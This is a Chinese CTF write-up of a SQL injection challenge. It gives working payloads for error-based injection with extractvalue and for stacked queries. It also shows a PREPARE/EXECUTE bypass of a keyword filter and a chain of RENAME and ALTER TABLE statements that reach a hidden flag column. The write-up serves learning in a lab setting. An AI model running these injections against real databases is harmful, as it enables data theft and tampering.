天命:这题考点有两个,第一个是闭合,第二个是叠堆注入
先探测一下是不是单引号闭合,其实我一开始以为是没有引号闭合的,毕竟是数字
经过测试,的确是单引号闭合
然后探测未知的东西,我习惯性直接上来就联合注入
然后他就反弹出了正则表达式拦截,不区分大小写拦截了以上关键字
然后试试叠堆注入,其实叠堆注入的这种题目出现很少,毕竟实际上只能运行一条sql语句的
测试了一下,发现的确是叠堆注入,所有的数据库都爆出来了
使用报错注入查看当前的数据库
=1' and extractvalue(1,concat(2,database())); -- 
查看当前数据库的表
那我们就知道了数据库是:supersqli,表是:1919810931114514,words
这里有神奇的一幕,就是要用反引号以及-- q
--空格是 --+ 我能理解,但是为啥要加个q呢
` ` 反引号据说是无敌的,具体原理我研究了一下也不敢确定,就不写了
=1'; show columns from `1919810931114514` -- q
发现这个表只有一个字段,就写着flag,那我们读取这个数据库的这个表的这列就可以了
然后有两个思路:
1. 预处理来执行sql语句
2. 利用现成的select语句进行查询,先改当前表名为flag的表名,然后再改字段,再展示
【思路一】
=1'; PREPARE A from concat('s','elect flag from `1919810931114514`') ;
execute A -- q【思路二】
- 先将 words 改为别的名字 比如 words2 或者其他
- 然后将 1919810931114514 改为 words
- 把属性名flag改为id,然后用1’ or 1=1;# 显示flag出来
在这之前当然要先把words表改名为其他
1';rename table words to word2;rename table `1919810931114514` to words;ALTER TABLE words ADD id int(10) DEFAULT '12';ALTER TABLE words CHANGE flag data VARCHAR(100);-- q好像第一种才是正常的做法
